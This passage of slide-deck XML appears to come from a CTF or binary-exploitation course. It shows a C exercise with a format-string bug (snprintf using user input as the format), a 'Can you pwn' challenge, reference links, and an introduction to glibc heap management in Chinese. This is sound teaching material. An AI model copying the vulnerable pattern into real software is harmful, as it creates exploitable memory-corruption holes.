              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>void main() {</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	for (int i = 0; i &lt; 2; i++) {</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    	    fgets(buf, 1024, stdin);</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    	    snprintf(s, 1024, buf);</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    	    puts(s);</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    	    fflush(stdout);</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF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867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF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136" name="Shape 2136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6911233" y="3130800"/>
            <a:ext cx="3588800" cy="16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2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Can you pwn</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>using different solutions?</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill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1" name="Shape 2141"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String Tools and Ref</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2142" name="Shape 2142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538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buChar char="-"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https://github.com/hellman/libformatstr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"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https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr/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FCAA0C6-5FEB-4A44-8708-E31EB131A0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257" y="2188918"/>
            <a:ext cx="9467342" cy="2254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798196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5B242C3-8CA9-436E-A166-131014FF0FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="631910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7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7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堆利用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CB0A884-696A-4DC1-B605-06733C741227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2911687" y="2108456"/>
            <a:ext cx="548906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堆管理器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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堆概述</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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32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Areana</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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Chunk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堆分配策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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Malloc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free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堆漏洞与其利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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59859081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625">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA6486D0-8A9D-4034-92C7-4D9DEC8B050D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="1761792"/>
            <a:ext cx="2263516" cy="321841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</a:rPr>
              <a:t>For Kernel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34" name="Shape 626">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DE33139-0FCF-45C5-9D03-4466DBF979C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="2083633"/>
            <a:ext cx="2263516" cy="329939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Stack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 627">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B893BA63-ADB6-4EB3-8F89-D21C619B80C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="2405475"/>
            <a:ext cx="2263516" cy="708826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Shape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A17B47-B940-4CAA-9D9D-4DD07C4197CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="3114301"/>
            <a:ext cx="2263516" cy="519735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shared libraries</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 629">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAF25EF-FF2C-43CD-A062-53DF30A7530B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="3634036"/>
            <a:ext cx="2263516" cy="708826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Shape 630">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26A7E7B0-4426-41C6-B5E6-09EF155A7312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="4342862"/>
            <a:ext cx="2263516" cy="321841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Heap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06B9A00-BB6D-4F23-ACAB-0CEA3C82EB0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="4664703"/>
            <a:ext cx="2263516" cy="321841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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEC857F8-D716-4150-9FA1-6C044A6E2E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="4986545"/>
            <a:ext cx="2263516" cy="321841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Text</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 633">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE06876-86F0-41EE-A5D6-0A27738357C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="5308386"/>
            <a:ext cx="2263516" cy="321841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Unused</a:t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42" name="Shape 634">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B8D12D-FCED-4D75-A7B7-BCBC47D77CE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="35" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3198003" y="2405475"/>
            <a:ext cx="0" cy="431704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3" name="Shape 635">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E6FCC5-243E-4E16-BEA6-EC9AC92D6451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="38" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3198003" y="3950596"/>
            <a:ext cx="0" cy="39226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4" name="文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65BE03EF-B4A1-4542-A27A-785FEDEB7A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6378031" y="1828797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什么是堆？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7072D26-E1BF-4A91-96F2-310C1BD8CF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2992567"/>
            <a:ext cx="541833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是虚拟地址空间的一块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连续的线性区域</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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提供动态分配的内存，允许程序申请大小未知的内存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty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在用户与操作系统之间，作为动态内存管理的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中间人</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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响应用户的申请内存请求， 向操作系统申请内存，然后将其返回给用户程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty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管理用户所释放的内存，适 时归还给操作系统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E0C488FD-CB9B-43A7-96B9-C990A9E7C4B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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堆概述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8428508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文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65BE03EF-B4A1-4542-A27A-785FEDEB7A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567721" y="2247772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各种堆管理器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7072D26-E1BF-4A91-96F2-310C1BD8CF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630072" y="3192336"/>
            <a:ext cx="452217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dlmalloc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– General purpose allocator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ptmalloc2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– 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glibc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（敲黑板）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jemalloc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– FreeBSD and Firefox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tcmalloc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– Google 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libumem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– Solaris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E958F3E-1971-488F-B0FA-0B9BFE67BF07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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堆概述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09E65F4-6436-4869-9112-164DBD7ED522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7039753" y="2832547"/>
            <a:ext cx="433891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堆管理器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并非由操作系统实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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，而是由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libc.so.6链接库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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实现。 封装了一些系统调用，为用户提供方便的动态内存分配接口的同时，力求高效地管理由系统调用申请来的内存。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1602358351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文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65BE03EF-B4A1-4542-A27A-785FEDEB7A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552010" y="2370426"/>
            <a:ext cx="2954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申请内存的系统调用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7072D26-E1BF-4A91-96F2-310C1BD8CF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613984" y="3273013"/>
            <a:ext cx="206912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brk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mmap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6501412-DFA9-4B90-9B1C-2E7885255270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695092" y="1318847"/>
            <a:ext cx="2171700" cy="891612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Application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C03BAF9-DA9D-41FF-ABDC-5FC6E5E3E5EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695092" y="2652266"/>
            <a:ext cx="2171700" cy="891612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malloc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr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7C54A7A1-7DC9-4CD7-96E6-DE1A6EF3C5DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5780942" y="2210459"/>
            <a:ext cx="0" cy="441807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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A89004C6-0788-4A1E-AC89-BDEDCEECCE84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523392" y="4094285"/>
            <a:ext cx="2171700" cy="891612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__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>brk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766D6B21-7803-419E-8FBB-1CBE7B231DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523392" y="5427704"/>
            <a:ext cx="2171700" cy="891612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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sys_brk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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035D7C96-DD7C-43D0-B1BF-2D22E3F751A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="2"/>
            <a:endCxn id="16" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609242" y="4985897"/>
            <a:ext cx="0" cy="441807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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9A8E815-FED5-4F05-8E54-3D044EED2DAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6866792" y="4094285"/>
            <a:ext cx="2171700" cy="891612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__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mmap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EECB23D1-6A0A-445A-8DD5-246D9C33C44B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6866792" y="5427704"/>
            <a:ext cx="2171700" cy="891612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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sys_mmap_pgoff</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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AAC94D23-3203-4B44-AD12-3F2B931CB8D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7952642" y="4985897"/>
            <a:ext cx="0" cy="441807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9E8605CC-3792-40EE-8A71-ABA55B756224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="1"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3609242" y="3098072"/>
            <a:ext cx="1085850" cy="996213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6E1F5481-D9D7-4885-93FB-0C773DC2E084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6866792" y="3098072"/>
            <a:ext cx="1085850" cy="996213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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{130A99F5-EC69-4E59-B505-1596B3AD8EC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7008314" y="1441487"/>
            <a:ext cx="22878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System independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>application code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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C87CC7C5-A993-4186-B1A5-431C481BF2E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7266222" y="2782669"/>
            <a:ext cx="22878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System independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>library code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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C68AE16C-E114-4E0C-8EAB-BB0BDED56ECC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9245114" y="4216925"/>
            <a:ext cx="29803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System independent library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
